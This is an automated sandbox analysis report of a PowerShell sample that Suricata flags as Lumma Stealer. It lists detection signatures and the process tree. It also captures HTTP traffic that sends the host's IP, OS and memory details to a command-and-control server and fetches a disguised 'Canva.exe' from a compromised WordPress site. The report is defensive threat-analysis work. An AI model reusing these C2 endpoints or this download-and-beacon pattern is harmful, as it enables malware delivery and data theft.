Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oNvY66Z8jp.ps1

Overview

General Information

Sample name:oNvY66Z8jp.ps1
renamed because original name is a hash value
Original sample name:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d.ps1
Analysis ID:1617746
MD5:979fbff01ba40f65e4eae87012b024a0
SHA1:4ff2c55e9b40206244f6f93b097a818cffb0d6d2
SHA256:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d
Tags:91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Installs new ROOT certificates
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 2556 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5572, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", ProcessId: 5676, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5572, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1", ProcessId: 5676, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:27:32.949584+010020216971A Network Trojan was detected192.168.2.549706172.67.149.252443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:27:33.894508+010028032742Potentially Bad Traffic192.168.2.54970791.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:27:32.048026+010028602321Malware Command and Control Activity Detected192.168.2.54970591.206.178.1205001TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:27:32.048110+010028602331Malware Command and Control Activity Detected91.206.178.1205001192.168.2.549705TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:27:29.827006+010018100002Potentially Bad Traffic192.168.2.549704104.26.12.20580TCP
2025-02-18T08:27:32.048026+010018100002Potentially Bad Traffic192.168.2.54970591.206.178.1205001TCP
2025-02-18T08:27:32.949584+010018100002Potentially Bad Traffic192.168.2.549706172.67.149.252443TCP
2025-02-18T08:27:33.894508+010018100002Potentially Bad Traffic192.168.2.54970791.206.178.1205001TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumberAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=91530Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=91530$MAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$raAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=MicrosoftAvira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: oNvY66Z8jp.ps1Virustotal: Detection: 14%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.3% probability
Source: unknownHTTPS traffic detected: 172.67.149.252:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.5:49705
Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.5:49706 -> 172.67.149.252:443
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 5001
Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49707
Source: global trafficTCP traffic: 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 104.26.12.205:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49707 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 91.206.178.120:5001
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49706 -> 172.67.149.252:443
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hostelaunpaso.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=91530 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownTCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hostelaunpaso.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /script_end?random_number=91530 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: hostelaunpaso.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 07:27:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closestrict-transport-security: max-age=15768000; includeSubDomainscf-cache-status: BYPASSvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CzbYHRAAxRQwPViaa0Jrqj8yy13yAZ1OBap9FJFhjh9sL9TpCvVg1PyAW3OZLJHk9mzXqt6Ou9%2FtQ3vrC5dkMWLB5Pr4f6vjcrblJX81xLBqmeiG98dYijoZCIXU%2FW7H2EmSDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c4b951a752394-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1934&rtt_var=734&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=860&delivery_rate=1481481&cwnd=252&unsent_bytes=0&cid=f72ead2660dac038&ts=393&x=0"
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=91530
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_end?random_number=91530$M
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/P&
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/p
Source: powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify8r
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2176348749.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hostelaunpaso.com/wp-cont
Source: powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1String found in binary or memory: https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search
Source: powershell.exe, 00000000.00000002.2176348749.0000000004A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hostelaunpaso.commd
Source: powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 172.67.149.252:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: classification engineClassification label: mal80.troj.winPS1@3/7@2/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otxbg1dy.nwk.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: oNvY66Z8jp.ps1Virustotal: Detection: 14%
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\oNvY66Z8jp.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
